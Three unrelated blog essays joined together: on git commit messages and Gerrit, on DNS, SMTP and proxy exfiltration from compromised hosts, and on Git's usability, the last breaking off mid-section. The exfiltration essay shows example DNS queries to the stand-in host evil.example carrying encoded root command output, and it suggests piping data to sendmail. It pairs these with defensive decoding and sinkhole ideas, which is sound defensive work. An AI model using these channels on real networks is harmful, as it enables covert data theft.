
Of Git Commits, GitHub, and Gerrit


I am a connoisseur of fine git commit messages. I also find myself in the unenviable position of Gerrit defender. These two facts are not entirely unrelated.

Impassioned ranting about the format of commit messages[1] often feels like cringe-inducing gatekeeping. Many times such rants seem to be written using language both bombastic and bellicose – the message is: fuck off if you don’t agree.

The fact that the authors of many of these rants tend to be respected in the software community is confounding to many. Defense of these rants is commonplace and, likewise, is swift, absolute, and equally, seemingly, meant as a giant middle-finger to the uninitiated.

Explaining new concepts to people unfamiliar with them is a good way of testing your understanding. Explaining new concepts repeatedly, in a seemingly unending cycle, is a good test of your patience. Neither lack of understanding nor lack of patience excuses the bad behavior that is all-too-typical of the software hegemony.

This post is meant to explain when and why commit messages matter. Additionally, it explains a few thoughts about the Gerrit code review system.

Pull Request vs Commit

The common wisdom is that commit messages don’t matter on GitHub. When I collaborate on GitHub I commit often and my commit messages frequently contain “.gif”, ¯\_(ツ)_/¯, various curse words, and copious emoji. This is because the unit of change in GitHub is the pull request. My pull requests are thoughtful, and attempt to explain why I developed this particular patch, and try to provide means of testing for this change. When trying to bisect history in a repository developed on GitHub the merges of pull requests are the thing; i.e., Merge pull request #763 is meaningful. Pull request #763 probably has an explanation for what changed (even if your git log doesn’t).

The information contained in a pull request is useful, but is – by design – only accessible online with a web browser through github.com.

My current job uses Gerrit instead of GitHub. Gerrit doesn’t have pull requests, it has patches. The code review interface is arguably not as good as GitHub – I can’t set a unified diff view by default in my preferences, for instance. Gitiles is no substitute for using GitHub as a repo browser – you can’t link to blocks of code, for instance. Gerrit/Gitiles URLs are hard to remember, unlike GitHub’s. There is little in the way of a “prescribed workflow”. You as a developer must decide how to split patches meaningfully, and how to do that in such a way that adheres to any shared agreements about particular branches (e.g., master must be deployable).

Despite its flaws, I really like Gerrit.

Gerrit’s use of git aligns well with git’s design. The git history that Gerrit produces is beautiful, available offline, distributed, and usable via the git command line interface (more usable than in the browser, unfortunately). This is partially because the unit of change in Gerrit is a commit. As a result, git log --oneline is totally readable and totally useful!

I prefer the repo produced by Gerrit to the repo produced by GitHub for reasons that relate to development, operations, and values.

Development

If I’m considering making a change in a repository, especially when this change is an obvious or simple one, I worry. I worry: why wasn’t this approach chosen in the first place? Is there a bug that is being worked around by using a non-obvious approach? Am I in an area of code that is used in many areas of the code base, or is it used very seldom? Is there test coverage for this function that I can use to ensure I am not creating a regression? A good commit message would answer all of these questions, and maybe more I haven’t thought of yet.

In Gerrit this information lives with the repository; in GitHub it lives on github.com. It’s very important that the information exist somewhere.

I like the freedom to work on code when I’m on an airplane or somewhere else without WiFi. There may be software that can make this happen for GitHub. In Gerrit the unit of change is the commit, so the commit has most of the information that I want. With the addition of the review-notes Gerrit plugin, code reviews live in a special git notes namespace (refs/notes/review) and are also available with the repository offline.

Gerrit makes no recommendations whatsoever about how you develop, and nothing in the patch interface aligns with your local view of your changes necessarily. I feel like this is confusing for people new to using Gerrit, but it is also, after initiation to the concept, not a bad way to develop.

Operations

An appreciable portion of my job is grepping through git history in the shaky moments following an embarrassing production outage. This exercise has given me a deep appreciation for well-formatted git commit messages. I need to know: what changed, who changed it (not just who merged it), why it was changed, and why a particular approach was chosen.

Good commit message information helps me determine what to do with a change: do I need to wake up the person who made this commit, or can I simply revert it? Is this change merely setting an unused variable, or is it a feature flag that will unleash new functionality?

Having all this information at my fingertips, rather than having to dig through the 188(!) different repositories that are composed to create a production deployment of MediaWiki and extensions for all 933 wikis that exist in Wikimedia’s production infrastructure is important – I already have too many browser tabs open without having to dig through GitHub for repository histories.

Values

This section speaks more to my feelings about Gerrit vs GitHub as projects than about Gerrit vs GitHub repositories. In the case of GitHub’s use of pull requests, I feel like the two are inextricably linked – GitHub implements this feature in proprietary software outside the open source implementation of git, and the resultant repository is less usable as an artifact on its own because of this decision.

The essay Free software needs Free tools is probably a better summary of this topic than anything I could write here; however, the short version of this is: without the freedom to run, modify, study, and redistribute the software on which your project depends, your project is at the mercy of corporate caprice.

Corporations are beholden to shareholders, not to users. When a corporation pivots away from the customers that made it a success to serve a different market that it perceives as more valuable, that is not an uncommon or remarkable event: that is the design of a corporation.

If you are working on a software project that’s important – if your software provides an essential service, or essential infrastructure that is meant to last many years (even beyond a single human lifetime) – you cannot afford to lose a part of your infrastructure in the event that a (possibly erroneous) business analysis has identified a more efficient profit-center for a business.

There are many counter-arguments to the ones I’ve made above; however, to summarize a few counter-arguments (possibly unfairly) they are:

  1. <Closed Source/Hosted provider>’s core business is acting in their customers’ best interest; if its goal is to provide value to shareholders, then to do so means being a better service for its existing customers. Our interests and the business’s interests are aligned.
  2. <Closed Source/Hosted provider> is based on an open standard, so the information is portable, if they become a bad actor, we can port information to a different solution.

To argument one: there are myriad examples of business decisions made at the expense of customers. This is particularly true once a business entity becomes a monopoly power as so many tech companies are at this moment. I think anyone would concede the example of large cable companies offering poor service to customers despite the fact that customers provide their revenue. Business interests and customer interests, even when they are currently aligned, may not always be.

To argument two: in the instance of GitHub above (and this is applicable to other services as well) they have proprietary features (i.e., “pull requests”) that make them incompatible with portability. In other instances, the compatibility with a portable solution is invalidated by the point of business caprice.

How I commit now

If commit messages are important (as I argue above), then it is a valuable exercise to evaluate the way in which you write your commit messages.

Earlier this year I came across Vicky Lai’s post “Git Commit Practices Your Future Self Will Thank You For”, which (for me anyway) highlighted the use of the git commit.template. Vicky provided an example in the post that I’ve been refining for myself.

I’ve followed git commit best practices[2][3][4] for years, so initially the template wasn’t proving too useful. I started to think about what was missing from my commit messages, where I could improve formatting, and where I could save myself some time searching.

The first issue I identified is that I can’t remember the names of commit message fields like Signed-off-by or Requested-by. Also, my capitalization and ordering of those fields was all over the place. What are the best practices for using these fields? I could never remember. I put all these fields in my template, along with a link to the kernel patch submission guidelines for easy reference.

The next issue I had was that there are myriad schools of thought about commit message bodies. Bullet points vs Problem/Solution vs “answers the following questions”. The basic questions of “What is wrong with the code that this patch fixes?” sometimes hindered my ability to write a commit message that made sense. I wanted options. I wanted examples. I wanted links in case I felt like reading more. I added all this to my template.

Finally, I noticed that vim does some syntax highlighting in the commit screen. Specifically, lines that end with :. So I made sure that the only lines that ended with : were important sections.

I think I have a template I can live with for a while. It’s verbose. Probably too verbose, really. But my mind works in ways I don’t understand sometimes. To keep it on track, I need all the information it craves at my fingertips in a context-dependent way. I think this template is ideal for that.

Git Commit ZOMG!!1!

The commit.template below is in my dotfiles as .git-commit-zomg. I install the template using the command git config --global commit.template ~/.git-commit-zomg.

I named this template .git-commit-zomg because I have mixed feelings about commit messages. I think a lot about commit messages. I think they’re important. I evidently feel that they’re “rant worthy” in some context. I still, however, know people will decide the value of commit messages on their own. You can tell people the value you think commit messages will have, and they’ll maybe acknowledge your concerns are valid. Maybe they’ll even make changes in their process. But no one groks to fullness.

Someday production will be down. Rollback will have failed with an opaque error. Your mind will be screaming too loud for you to think clearly. You’ll frantically grep git log output for the error message – something, anything – and you’ll come face-to-face with a commit (probably authored by you) that reads, simply, ¯\_(ツ)_/¯. To paraphrase Jack Handey: when this moment comes, if you’re drinking milk, I bet it will make milk come out your nose.


# ^^ Subject: summary of your change:
# * 50 Characters is a soft limit (aim for < 80)
# * "If applied, this commit will..."
# * Use the imperative mood; e.g.,
#   (Change/Add/Fix/Remove/Update/Refactor/Document)
# * Do not end the subject with a period (full stop)
# * Optionally, prefix the subject with the relevant component
#   (the general area of code being modified)
#
# Example[0]
#
#     jquery.badge: Add ability to display the number zero
#
# [0]. <https://www.mediawiki.org/wiki/Gerrit/Commit_message_guidelines#Subject>
#
# Leave this blank line below your subject:

# Body: Additional information about a commit:

# Think about these questions
#
# * Why should this change be made?
#   What is wrong with the current code?
# * Why should it be changed in this way?
#   Are there other ways?
# * How can a reviewer confirm that your change works as intended?[0]
#
# * An alternative format may be a problem/solution commit as used in
#   ZeroMQ[1]; e.g.
#
#       * Problem: Windows build script requires edit of VS version
#       * Solution: Use CMD.EXE environment variable to extract
#         DevStudio version number and build using it.
#
# [0]. <https://www.mediawiki.org/wiki/Gerrit/Commit_message_guidelines#Body>
# [1]. <http://zeromq.org/docs:contributing#toc3>

# ---
#
# Bug number:
#
# Bug: TXXXXXX
#
# ---
#
# Gerrit specific:
#
# Change-Id: IXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
# Depends-On: IXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
#
# ---
#
# Sign your work:
#
# > The sign-off is a simple line at the end of the explanation for the
# > patch, which certifies that you wrote it or otherwise have the right to
# > pass it on as a open-source patch [0]
#
# Signed-off-by: Example User <user@example.com>
#
# [0]. <https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/tree/Documentation/SubmittingPatches?id=4e8a2372f9255a1464ef488ed925455f53fbdaa1>
#
# ---
#
# Other Nice Things:
#
# If you worked on a patch with others it's nice to credit them for
# their contributions; however, these tags should not be added without
# your collaborator's permission!

# Acked-by: Example User <user@example.com>
# Cc: Example User <user@example.com>
# Co-Authored-by: Example User <user@example.com>
# Requested-by: Example User <user@example.com>
# Reported-by: Example User <user@example.com>
# Reviewed-by: Example User <user@example.com>
# Suggested-by: Example User <user@example.com>
# Tested-by: Example User <user@example.com>
# Thanks: Example User <user@example.com>
#
# ---
#        _ _                                   _ _
#   __ _(_) |_    ___ ___  _ __ ___  _ __ ___ (_) |_   _______  _ __ ___   __ _
#  / _` | | __|  / __/ _ \| '_ ` _ \| '_ ` _ \| | __| |_  / _ \| '_ ` _ \ / _` |
# | (_| | | |_  | (_| (_) | | | | | | | | | | | | |_   / / (_) | | | | | | (_| |
#  \__, |_|\__|  \___\___/|_| |_| |_|_| |_| |_|_|\__| /___\___/|_| |_| |_|\__, |
#  |___/                                                                  |___/
#
# Save to `~/.git-commit-zomg` Then run:
#
#     git config --global commit.template ~/.git-commit-zomg
#
# The idea for this template came from Vicky Lai[0]
#
# [0]. <https://vickylai.com/verbose/git-commit-practices-your-future-self-will-thank-you-for/>
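
The subject rules in the template above are mechanical enough to check automatically. What follows is a minimal sketch in Python, not part of the template or of git itself: the function name lint_commit_message is made up for illustration, and the verb list is simply the handful of examples the template gives, so a real check would need something more generous.

```python
import re

SOFT_LIMIT = 50  # the template's soft limit for the subject
HARD_LIMIT = 80  # the template's "aim for < 80"

# Only the example verbs from the template; an assumption, not a complete list.
IMPERATIVE_VERBS = {"Change", "Add", "Fix", "Remove", "Update", "Refactor", "Document"}


def lint_commit_message(message):
    """Return a list of problems found in a commit message (hypothetical helper)."""
    # Ignore "#" comment lines, which git strips from a templated message.
    lines = [line for line in message.splitlines() if not line.startswith("#")]
    if not lines or not lines[0].strip():
        return ["subject is empty"]

    problems = []
    subject = lines[0]
    if len(subject) >= HARD_LIMIT:
        problems.append("subject is 80 characters or longer")
    elif len(subject) > SOFT_LIMIT:
        problems.append("subject is over the 50-character soft limit")
    if subject.endswith("."):
        problems.append("subject ends with a period")

    # Drop an optional "component: " prefix before looking at the verb.
    summary = re.sub(r"^[\w./-]+: ", "", subject)
    first_word = summary.split(" ", 1)[0]
    if first_word not in IMPERATIVE_VERBS:
        problems.append("subject does not start with a listed imperative verb")

    if len(lines) > 1 and lines[1].strip():
        problems.append("no blank line between subject and body")
    return problems


print(lint_commit_message("Fixed the thing."))
```

A check like this could run from a commit-msg hook, though it only covers form: whether the body answers "why" still takes a human.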

  1. https://github.com/torvalds/linux/pull/17#issuecomment-5654674

  2. https://tbaggery.com/2008/04/19/a-note-about-git-commit-messages.html

  3. https://www.mediawiki.org/wiki/Gerrit/Commit_message_guidelines

  4. https://juffalow.com/other/write-good-git-commit-message


Exfiltration, correctness, and the race to market


Let's say you're a bad person, and you've managed to break into a machine inside some organization. Maybe you can't get to it directly, but you can inject some payload which eventually makes some machine inside the beast run your command. How do you get the results out? Assume that you can't just connect to the outside world -- there's a firewall preventing it.

The magic of getting this stuff out of the hard-to-reach machine and back to you is known as exfiltration, and not everyone defends against it. I've seen a couple of interesting techniques over the years. None of this should be news to anyone working in the security space, but I figure they're worth mentioning for folks who haven't encountered them yet.

For starters, how about DNS? If you control a domain, evil.example, and you run the nameservers, then every single request that isn't cached somewhere out in the world will come direct to your machines. What are the odds that a machine inside a typical tech company will be able to resolve arbitrary DNS hosts, inside and out? I'd say pretty good.

All you'd have to do is make sure the data would fit in a request, glue your domain on the end, and fire it off. You could do this with any tool which generates DNS lookups - it doesn't have to be dig or host... how about telnet, or netcat, or ping?

Do you think anyone would notice this? I'm guessing many places would not. Sure, if you've already invested in some kind of "behavior based" firewalling stuff which looks for strange things happening, it might catch it, but I would have to hope such a place already cut DNS off from the outside world.

Put another way, would you notice DNS queries like this?

dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3.001.evil.example
JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFl.002.evil.example
bW9uKSwzKHN5cyksNChhZG0pLDYoZGlzay.003.evil.example
ksMTAod2hlZWwpLDExKGZsb3BweSksMTco.004.evil.example
YXVkaW8pCg==.005.evil.example

Five DNS queries later, someone knows they managed to get their command to run somewhere, and that it's running with root privileges on the box. Party time!
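
From the defender's side, working out what leaked from lookups like these takes only a few lines once you have the query log. Here is a minimal sketch in Python, assuming the layout seen in the example (a base64 chunk, then a sequence number, then the attacker's domain); the function name reassemble_dns_payload is made up for illustration.

```python
import base64


def reassemble_dns_payload(query_names, suffix=".evil.example"):
    """Rebuild the data carried by chunked lookups under one domain.

    Assumes each name looks like <base64 chunk>.<sequence>.<domain>,
    as in the example queries; anything else is not handled.
    """
    chunks = []
    for name in query_names:
        if not name.endswith(suffix):
            continue  # an unrelated lookup
        payload, sequence = name[: -len(suffix)].rsplit(".", 1)
        chunks.append((int(sequence), payload))
    # Queries can show up in any order, so sort by sequence number first.
    encoded = "".join(payload for _, payload in sorted(chunks))
    return base64.b64decode(encoded).decode("ascii")


QUERIES = [
    "dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3.001.evil.example",
    "JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFl.002.evil.example",
    "bW9uKSwzKHN5cyksNChhZG0pLDYoZGlzay.003.evil.example",
    "ksMTAod2hlZWwpLDExKGZsb3BweSksMTco.004.evil.example",
    "YXVkaW8pCg==.005.evil.example",
]

print(reassemble_dns_payload(QUERIES), end="")
```

Run against the five names above, this prints what looks like the output of id run as root, starting with uid=0(root) gid=0(root).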

So maybe you fix that one, and make it so that internal hosts can only resolve other internal domains. Good for you, since this can be surprisingly difficult to get right without breaking anything else. There are still other fun ways to get stuff out.

How about SMTP? You know, good old e-mail. If the machine is running sendmail or postfix or something else of that sort, it's probably doing it for a reason. Why not try to just pipe some command into 'sendmail you@evil.example' and see if it gets there? You might be surprised just how many places have huge corporate relaying infrastructures set up "just in case" a machine wants to mail the outside world. The compromised host might not be able to hit your port 25, but I bet it knows a friend who can!

Now, the machine itself might generate a from address that doesn't resolve on the outside world, so you'll have to make sure your receiving host(s) allow such shenanigans, but you already set that up, right?

Obviously there are also the hosts which "helpfully" set up a http[s] proxy for everyone on the box, so you can just wget or curl something and it'll Just Work. It'll bounce out through some corporate proxy or somesuch, and the data will be deposited on your electronic doorstep, all wrapped up in a neat little package. This one is hopefully a given so I didn't lead with it. If this exists, you don't need the more interesting methods.

By the way, if you choose to lock down your systems so that this kind of stuff doesn't work, you might also take the chance to not just bitbucket the traffic. If hosts should never resolve the outside world, maybe provide a resolver which pretends to answer for all of them, but logs the attempts anyway. Or, if they should never mail the world, accept the mail and see where it's going. Or have a dummy http[s] proxy which just gobbles the request and holds on to the payload for later analysis.
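
The "answer everything, but log it" resolver boils down to one decision per lookup. Below is a minimal sketch of that decision in Python, with no actual DNS server around it. Everything in it is an assumption for illustration: the function names, the corp.example zone, and the sinkhole address (taken from the 192.0.2.0/24 documentation range).

```python
SINKHOLE_ADDRESS = "192.0.2.1"  # placeholder from a documentation-only range


def is_internal(name, internal_zones):
    """True if name is one of the internal zones or sits underneath one."""
    name = name.rstrip(".").lower()
    return any(name == zone or name.endswith("." + zone) for zone in internal_zones)


def answer_query(name, client, internal_zones, attempts):
    """Decide what a logging sinkhole resolver would do with one lookup.

    Internal names resolve normally. Anything else gets a fake answer,
    and the attempt is recorded (with the name exactly as asked) for later analysis.
    """
    if is_internal(name, internal_zones):
        return ("resolve", name)
    attempts.append((client, name))
    return ("sinkhole", SINKHOLE_ADDRESS)


attempts = []
zones = {"corp.example"}
print(answer_query("build01.corp.example", "10.0.0.5", zones, attempts))
print(answer_query("YXVkaW8pCg==.005.evil.example", "10.0.0.5", zones, attempts))
print(attempts)
```

The point of answering instead of dropping is that the attempts list now says which internal host tried to talk to the outside, and what it tried to say.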

Obviously, all of this should already exist on the marketplace and should Just Work for everyone, but for a random web company with 100-1000 machines and a handful of employees, are they thinking about this? I'm guessing they are not. They're just trying to stay afloat and get some kind of footing with their market. Engineering and security correctness are probably way down the list of things they care about.

The sad part is that the places which do put that stuff first probably don't make it to market in time (or ever), wind up failing, and so their hard work means nothing. If this turns out to be true, then you'll see a pattern of companies throwing up literally whatever crap they can get to run, and then if it sticks and they make money, then they come back and "backfill" and try to pay down the technical debt they imposed on themselves.

This is a good reason why a bunch of online services are just plain terrifying. The paths to viability usually involve a great many awful compromises, both in terms of "we'll just have to get to that later" and "oops, we've been owned".

I think this is one of the valley's dirty little secrets. Sorry, world.


High-level Problems with Git and How to Fix Them


I have a... complicated relationship with Git.

When Git first came onto the scene in the mid-2000s, I was initially skeptical because of its horrible user interface. But once I learned it, I appreciated its speed and features - especially the ease with which you could create feature branches, merge, and even create commits offline (which was a big deal in the era when Subversion was the dominant version control tool in open source and you needed to speak with a server in order to commit code). When I started using Git day-to-day, it was such an obvious improvement over what I was using before (mainly Subversion and even CVS).

When I started working for Mozilla in 2011, I was exposed to the Mercurial version control tool, which then - and still today - hosts the canonical repository for Firefox. I didn't like Mercurial initially. Actually, I despised it. I thought it was slow and its features lacking. And I frequently encountered repository corruption.

My first experience learning the internals of both Git and Mercurial came when I found myself hacking on hg-git - a tool that allows you to convert Git and Mercurial repositories to/from each other. I was hacking on hg-git so I could improve the performance of converting Mercurial repositories to Git repositories. And I was doing that because I wanted to use Git - not Mercurial - to hack on Firefox. I was trying to enable an unofficial Git mirror of the Firefox repository to synchronize faster so it would be more usable. The ulterior motive was to demonstrate that Git is a superior version control tool and that Firefox should switch its canonical version control tool from Mercurial to Git.

In what is a textbook definition of irony, what happened instead was I actually learned how Mercurial worked, interacted with the Mercurial Community, realized that Mozilla's documentation and developer practices were... lacking, and that Mercurial was actually a much, much more pleasant tool to use than Git. It's an old post, but I summarized my conversion four and a half years ago. This started a chain of events that somehow resulted in me contributing a ton of patches to Mercurial, taking stewardship of hg.mozilla.org, and becoming a member of the Mercurial Steering Committee - the governance group for the Mercurial Project.

I've been an advocate of Mercurial over the years. Some would probably say I'm a Mercurial fanboy. I reject that characterization because fanboy has connotations that imply I'm ignorant of realities. I'm well aware of Mercurial's faults and weaknesses. I'm well aware of Mercurial's relative lack of popularity. I'm well aware that this lack of popularity almost certainly turns away contributors to Firefox and other Mozilla projects because people don't want to have to learn a new tool. I'm well aware that there are changes underway to enable Git to scale to very large repositories and that these changes could threaten Mercurial's scalability advantages over Git, making choices to use Mercurial even harder to defend. (As an aside, the party most responsible for pushing Git to adopt architectural changes to enable it to scale these days is Microsoft. Could anyone have foreseen that?!)

I've achieved mastery in both Git and Mercurial. I know their internals and their command line interfaces extremely well. I understand the architecture and principles upon which both are built. I'm also exposed to some very experienced and knowledgeable people in the Mercurial Community. People who have been around version control for much, much longer than me and have knowledge of random version control tools you've probably never heard of. This knowledge and exposure allows me to make connections and see opportunities for version control that quite frankly most do not.

In this post, I'll be talking about some high-level, high-impact problems with Git and possible solutions for them. My primary goal of this post is to foster positive change in Git and the services around it. While I personally prefer Mercurial, improving Git is good for everyone. Put another way, I want my knowledge and perspective from being part of a version control community to be put to good use wherever it can be.

Speaking of Mercurial, as I said, I'm a heavy contributor and am somewhat influential in the Mercurial Community. I want to be clear that my opinions in this post are my own and I'm not speaking on behalf of the Mercurial Project or the larger Mercurial Community. I also don't intend to claim that Mercurial is holier-than-thou. Mercurial has tons of user interface failings and deficiencies. And I'll even admit to being frustrated that some systemic failings in Mercurial have gone unaddressed for as long as they have. But that's for another post. This post is about Git. Let's get started.

The Staging Area

The staging area is a feature that should not be enabled in the default Git configuration.

Most people see version control as an obstacle standing in the way of accomplishing some other task. They just want to save their progress towards some goal. In other words, they want version control to be a save file feature in their workflow.

Unfortunately, modern version control tools don't work that way. For starters, they require people to specify a commit message every time they save. This in and of itself can be annoying. But we generally accept that as the price you pay for version control: that commit message has value to others (or even your future self). So you must record it.

Most people want saving changes to be effortless. A commit message is already too annoying for many users! The Git staging area establishes a higher barrier to saving. Instead of just saving your changes, you must first stage your changes to be saved.

If you requested save in your favorite GUI application, text editor, etc and it popped open a "select the changes you would like to save" dialog, you would rightly think "just save all my changes already, dammit." But this is exactly what Git does with its staging area! Git is saying "I know all the changes you made: now tell me which changes you'd like to save." To the average user, this is infuriating because it works in contrast to how the save feature works in almost every other application.

There is a counterargument to be made here. You could say that the editor/application/etc is complex - that it has multiple contexts (files) - that each context is independent - and that the user should have full control over which contexts (files) - and even changes within those contexts - to save. I agree: this is a compelling feature. However, it isn't an appropriate default feature. The ability to pick which changes to save is a power-user feature. Most users just want to save all the changes all the time. So that should be the default behavior. And the Git staging area should be an opt-in feature.

If intrinsic workflow warts aren't enough, the Git staging area has a horrible user interface. It is often referred to as the cache for historical reasons. Cache of course means something to anyone who knows anything about computers or programming. And Git's use of cache doesn't at all align with that common definition. Yet the terminology in Git persists. You have to run commands like git diff --cached to examine the state of the staging area. Huh?!

But Git also refers to the staging area as the index. And this terminology also appears in Git commands! git help commit has numerous references to the index. Let's see what git help glossary has to say:

index
    A collection of files with stat information, whose contents are
    stored as objects. The index is a stored version of your working tree.
    Truth be told, it can also contain a second, and even a third
    version of a working tree, which are used when merging.

index entry
    The information regarding a particular file, stored in the index.
    An index entry can be unmerged, if a merge was started, but not
    yet finished (i.e. if the index contains multiple versions of that
    file).

In terms of end-user documentation, this is a train wreck. It tells the lay user absolutely nothing about what the index actually is. Instead, it casually throws out references to stat information (requires the user know what the stat() function call and struct are) and objects (a Git term for a piece of data stored by Git). It even undermines its own credibility with that "truth be told" sentence. This definition is so bad that it would probably improve user understanding if it were deleted!

Of course, git help index says "No manual entry for gitindex". So there is literally no hope for you to get a concise, understandable definition of the index. Instead, it is one of those concepts that you think you learn from interacting with it all the time: "Oh, when I git add something it gets into this state where git commit will actually save it."

And even if you know what the Git staging area/index/cache is, it can still confound you. Do you know the interaction between uncommitted changes in the staging area and working directory when you git rebase? What about git checkout? What about the various git reset invocations? I have a confession: I can't remember all the edge cases either. To play it safe, I try to make sure all my outstanding changes are committed before I run something like git rebase because I know that will be safe.

The Git staging area doesn't have to be this complicated. A re-branding away from index to staging area would go a long way. Git already accepts git diff --staged as a synonym for git diff --cached; promoting that spelling and removing references to the cache from common user commands would make a lot of sense and reduce end-user confusion.

Of course, the Git staging area doesn't really need to exist at all! The staging area is essentially a soft commit. It performs the save progress role - the basic requirement of a version control tool. And in some aspects it is actually a better save progress implementation than a commit because it doesn't require you to type a commit message! Because the staging area is a soft commit, all workflows using it can be modeled as if it were a real commit and the staging area didn't exist at all! For example, instead of git add --interactive + git commit, you can run git commit --interactive. Or if you wish to incrementally add new changes to an in-progress commit, you can run git commit --amend or git commit --amend --interactive or git commit --amend --all. If you actually understand the various modes of git reset, you can use those to uncommit. Of course, the user interface to performing these actions in Git today is a bit convoluted. But if the staging area didn't exist, new high-level commands like git amend and git uncommit could certainly be invented.

To the average user, the staging area is a complicated concept. I'm a power user. I understand its purpose and how to harness its power. Yet when I use Mercurial (which doesn't have a staging area), I don't miss the staging area at all. Instead, I learn that all operations involving the staging area can be modeled as other fundamental primitives (like commit amend) that you are likely to encounter anyway. The staging area therefore constitutes an unnecessary burden and cognitive load on users. While powerful, its complexity and the confusion it incurs do not justify its existence in the default Git configuration. The staging area is a power-user feature and should be opt-in.

Branches and Remotes Management is Complex and Time-Consuming

When I first used Git (coming from CVS and Subversion), I thought branches and remotes were incredible because they enabled new workflows that allowed you to easily track multiple lines of work across many repositories. And ~10 years later, I still believe the workflows they enable are important. However, having amassed a broader perspective, I also believe their implementation is poor and this unnecessarily confuses many users and wastes the time of all users.

My initial zen moment with Git - the time when Git finally clicked for me - was when I understood Git's object model: that Git is just a content indexed key-value store consisting of different object types (blobs, trees, and commits) that have a particular relationship with each other. Refs are symbolic names pointing to Git commit objects. And Git branches - both local and remote - are just refs having a well-defined naming convention (refs/heads/<name> for local branches and refs/remotes/<remote>/<name> for remote branches). Even tags and notes are defined via refs.
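The object model can be poked at directly with Git's plumbing commands. This is a minimal sketch in a throwaway repository; the branch name trunk and the file name are arbitrary choices for the demo.

```shell
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
git symbolic-ref HEAD refs/heads/trunk   # arbitrary branch name for the demo
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.com

echo hello > greeting.txt
git add greeting.txt
git commit -q -m 'first commit'

# A branch is a ref under refs/heads/ that resolves to a commit id.
commit_id=$(git rev-parse refs/heads/trunk)
# The commit points at a tree, and the tree points at blobs.
tree_id=$(git rev-parse "$commit_id^{tree}")
blob_id=$(git rev-parse "$commit_id:greeting.txt")

commit_type=$(git cat-file -t "$commit_id")
tree_type=$(git cat-file -t "$tree_id")
blob_type=$(git cat-file -t "$blob_id")
echo "$commit_type -> $tree_type -> $blob_type"

# List every ref together with the type of object it points to.
ref_listing=$(git for-each-ref --format='%(refname) %(objecttype)')
echo "$ref_listing"
```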

Refs are a necessary primitive in Git because the Git storage model is to throw all objects into a single, key-value namespace. Since the store is content indexed and the key name is a cryptographic hash of the object's content (which for all intents and purposes is random gibberish to end-users), the Git store by itself is unable to locate objects. If all you had was the key-value store and you wanted to find all commits, you would need to walk every object in the store and read it to see if it is a commit object. You'd then need to buffer metadata about those objects in memory so you could reassemble them into say a DAG to facilitate looking at commit history. This approach obviously doesn't scale. Refs short-circuit this process by providing pointers to objects of importance. It may help to think of the set of refs as an index into the Git store.
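To make the contrast concrete, the sketch below finds commits both ways in a tiny throwaway repository: first by inspecting every object in the store, then by starting from refs. The repository contents are made up for the demo, and git cat-file --batch-all-objects needs a reasonably recent Git.

```shell
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.com

echo one > file.txt
git add file.txt
git commit -q -m 'first'
echo two >> file.txt
git commit -q --all -m 'second'

# Brute force: look at every object in the store and keep only the commits.
scanned=$(git cat-file --batch-all-objects --batch-check |
          awk '$2 == "commit" { print $1 }' | sort)

# With refs: start from the pointers and walk the history they reach.
from_refs=$(git rev-list --all | sort)

scanned_count=$(printf '%s\n' "$scanned" | wc -l | tr -d ' ')
echo "commits found by scanning: $scanned_count"
```

In a repository this small both approaches return the same commits. The difference is cost: the scan touches every blob and tree as well, while the walk from refs only visits commits.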

Refs also serve another role: as guards against garbage collection. I won't go into details about loose objects and packfiles, but it's worth noting that Git's key-value store also behaves in ways similar to a generational garbage collector like you would find in programming languages such as Java and Python. The important thing to know is that Git will garbage collect (read: delete) objects that are unused. And the mechanism it uses to determine which objects are unused is to iterate through refs and walk all transitive references from that initial pointer. If there is an object in the store that can't be traced back to a ref, it is unreachable and can be deleted.

Reflogs maintain the history of a value for a ref: for each ref they contain a log of what commit it was pointing to, when that pointer was established, who established it, etc. Reflogs serve two purposes: facilitating undoing a previous action and holding a reference to old data to prevent it from being garbage collected. The two use cases are related: if you don't care about undo, you don't need the old reference to prevent garbage collection.
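The interplay between refs, reflogs, and garbage collection can be observed in a scratch repository. This sketch creates a commit that no branch points to, shows that it survives while the reflog still mentions it, then expires the reflog and prunes. The branch name trunk and the file contents are arbitrary, and expiring reflogs like this is destructive, so it is only something to try in a throwaway repository.

```shell
set -e
repo=$(mktemp -d)
cd "$repo"
git init -q
git symbolic-ref HEAD refs/heads/trunk   # arbitrary branch name for the demo
export GIT_AUTHOR_NAME=demo GIT_AUTHOR_EMAIL=demo@example.com
export GIT_COMMITTER_NAME=demo GIT_COMMITTER_EMAIL=demo@example.com

echo base > file.txt
git add file.txt
git commit -q -m 'base'

# Commit without a branch, then walk away from it.
git checkout -q --detach
echo stray >> file.txt
git commit -q --all -m 'stray work'
stray=$(git rev-parse HEAD)
git checkout -q trunk

# No ref points at the commit, but the reflog for HEAD still does.
if git cat-file -e "$stray" 2>/dev/null; then before=present; else before=gone; fi

# Drop the reflog entries, then collect everything unreachable.
git reflog expire --expire=now --all
git gc -q --prune=now
if git cat-file -e "$stray" 2>/dev/null; then after=present; else after=gone; fi

echo "before gc: $before, after gc: $after"
```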

This design of Git's store is actually quite sensible. It's not perfect (nothing is). But it is a solid foundation to build a version control tool (or even other data storage applications) on top of.

The title of this section has to do with sub-optimal branches and remotes management. But I've hardly said anything about branches or remotes! And this leads me to my main complaint about Git's branches and remotes: that they are a very thin veneer over refs. The properties of Git's underlying key-value store unnecessarily bleed into user-facing concepts (like branches and remotes) and therefore dictate sub-optimal practices. This is what's referred to as a leaky abstraction.

I'll give some examples.

As I stated above, many users treat version control as a save file step in their workflow. I believe that any step that interferes with users saving their work is user hostile. This even includes writing a commit message! I already argued that the staging area significantly interferes with this critical task. Git branches do as well.

